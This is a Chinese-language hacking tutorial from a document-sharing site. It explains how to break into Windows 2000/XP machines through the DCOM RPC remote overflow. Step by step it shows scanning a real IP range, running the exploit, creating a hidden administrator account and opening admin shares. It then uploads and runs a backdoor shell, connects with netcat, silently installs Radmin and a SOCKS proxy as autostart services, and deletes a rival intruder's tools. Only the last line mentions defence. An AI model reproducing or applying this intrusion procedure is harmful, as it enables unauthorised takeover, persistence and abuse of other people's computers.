您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 质量控制/管理 > 利用dcomrpc远程溢出漏洞入侵主机
利用dcomrpc远程溢出漏洞入侵主机最近,网上非常流行dcomrpc,那今天我们就教你详细的利用dcomrpc入侵。和入侵之后必须做什么。需要的工具:很好的:radmin.EⅩE扫描工具:retinarpcdcom.EⅩE溢出攻击工具:RpcDcom(通用溢出工具)脚本开启telnet工具:telnet.vbeopentelnet.EⅩEresumetelnet.EⅩE代理:sksockserver.EⅩE后门程序:WinEggDropShellPro3thVersion好了,该做的都做的差不多了。先使用retinarpcdcom.EⅩE扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必随便扫一下就会发现有许多主机开放的135端口)211.217.50.xx第一个主机就被扫出来又此漏洞。看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下其他的缺陷主机开了3389端口我们可以上去看一下是xp版本还是win2k是win2kserver版本展开命令行:[查看dcomrpc的用法用法dcomrpc-d[options]]F:/hackcdrpc/dcomrpcRPCDCOMExpl01tcodedby.:[oc192.us]:.SecurityCompliedandModifiedbyExpl01t[options]Options:-d:Hostnametoattack[Required]-t:Type[Default:0]-r:Returnaddress[Default:Selectedfromtarget]-p:Attackport[Default:135]-l:Bindshellport[Default:666]Types:0[0x0018759f]:[Win2k-Universal]1[0x0100139d]:[WinXP-Universal]开始进行溢出:F:/hackcdrpc/dcomrpc-d211.217.50.xx0RPCDCOMremoteexpl01t-.:[oc192.us]:.SecurityCompliedandrecorrectedbyExpl01t[+]Resolvinghost..[+]Done.[+]Expl01ting....Justwait......等到出现,说明溢出成功c:/winnt/system32接着我们建立用户c:/winnt/system32netuserblueye$1111/add命令成功完成。把用户添加成超级管理员c:/winnt/system32netlocalgroupadministratorsblueye$/add命令成功完成。看看共享开了没有没有的话把共享开开c:/winnt/system32netshare清单是空的。c:/winnt/system32netshareipc$命令成功完成。c:/winnt/system32netshareadmin$命令成功完成。到这里我们入侵告一段落[建立IPC$连接,也可以使用tftp上传,先和对方建立连接]F:/hacknetuse//211.217.50.xx/ipc$1111/user:blueye$[上传一个后门程序到对方的主机里]F:/hackcopyd:/inject.EⅩE//211.217.50.xx/admin$/system32F:/hackcopyd:/tback.dll//211.217.50.xx/admin$/system32然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet使用opentelnet.EⅩE关闭开启的telnet使用resumetelnet//ipuserpassword如果忘记开共享可以使用脚本开启telnet来开共享,用法:cscripttelnet.vbeipuserpasswordnullport(null是验证方式)F:/hackopentenet//211.217.50.xxblueye$111114567F:/hacktelnet211.217.50.xx4567(省略)连接并运行后门程序运行后门程序命令根目录:inject.EⅩE-run(后门使用方法和安装都在zip文件里面包含了)后门端口123456F:/hacknc211.217.50.xx123456WelcomeToWinEggDropShellMatrixVersion[Melody]下面安装radmin,配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章。radmin.regraddrv.dlladmdll.dllr_server.EⅩE把这个4个文件copyc:/winnt/system32在目录下面执行命令c:/winnt/system32r_server/sradmin.reg-----导入注册表c:/winnt/system32r_server/install/silence-----安装radmin.并且不显示托盘c:/winnt/system32netstartr_server-----启动服务安装sock代理把sksockserver.EⅩEcopyc:/winnt/system32c:/winnt/system32sksockserver/install-----安装服务c:/winnt/system32sksockserver-configport1234----端口定在1234自己可以改c:/winnt/system32sksockserver-configstarttype2----开机自动启动c:/winnt/system32netstartskserver----启动服务最后删除共享netshareipc$/delnetshareadmin$/del在安装radmin的时候你发现有人已经安装了。看操作(我输入的内容)后门连接F:/hacknc211.217.50.xx123456WelcomeToWinEggDropShellMatrixVersion[Melody]#(pslist)[Melody]#(pskillr_server)[Melody]#(shell)c:/winnt/system32(delr_server.EⅩE)c:/winnt/system32(deladmdll.dll)c:/winnt/system32(delraddrv.dll)copy你自己的上去,然后安装省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密码。这时,你就会有疑问了!为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的。出现这样的情况最简单的解决办法telnet上去导入试试看,还可以先运行radmin然后在radmin的dos下导入,也是可以的。防御办法:安装rpc补丁,使用防火墙过滤135,445,139等端口。
本文标题:利用dcomrpc远程溢出漏洞入侵主机
链接地址:https://www.777doc.com/doc-5494623 .html